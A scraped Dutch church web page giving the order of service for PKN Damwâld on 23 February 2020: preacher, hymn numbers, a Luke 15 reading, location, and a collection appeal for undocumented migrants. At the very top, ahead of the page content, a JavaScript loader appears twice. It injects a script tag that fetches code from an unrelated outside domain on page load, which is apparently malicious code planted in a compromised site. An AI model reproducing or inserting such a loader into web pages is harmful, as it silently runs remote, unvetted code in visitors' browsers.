;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 23 februari 2020 9:30 uur - PKN Damwâld
zondag 23 februari 2020
09:30 uur

Kerkdienst zondag 23 februari 2020 9:30 uur

Informatie

Voorganger:Dhr. W. Feddema, Driesum
Organist:Jaap van der Horn
Liturgie
lied voor de dienst : Elb 421
Woord van welkom
Intochtslied Nlb 287 : 1, 2 en 5
Stilgebed, Bemoediging en groet
We zingen: Nlb 103 : 1 en 3
Gebod .
We zingen: Nlb 103 : 5
Gebed opening van Woord
We lezen: Lucas 15 : 11 - 32
We zingen: Nlb 723 : 1 en 2
Preek .
We zingen: Elb 376 frysk
Dankgebed en voorbede
Collecte
Slotlied Elb 289
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Hulp voor mensen zonder papieren

Binnenlands Diaconaat: Nederland – Hulp voor mensen zonder papieren
Volgens schattingen leven er in Nederland 30.000 migranten zonder verblijfsvergunning. Velen zijn arbeidsmigranten. Anderen hebben asiel aangevraagd en geen verblijfsvergunning gekregen, maar verlaten Nederland niet, bijvoorbeeld omdat het land van herkomst hen niet meer accepteert. Wie ongedocumenteerd in Nederland leeft, heeft maar weinig rechten. Bovendien is er altijd de angst om opgepakt en uitgezet te worden. Kerk in Actie onder steunt kerkelijke initiatieven, zoals het wereldhuis in Amsterdam en Den Haag, de Pauluskerk in Rotterdam en Villa Vrede in Utrecht die ongedocumenteerden helpen met informatie, advies en scholing. Collecteert u mee om al dit werk mogelijk te maken?

Tweede collecte: Kerk
Uitganscollecte: Kerk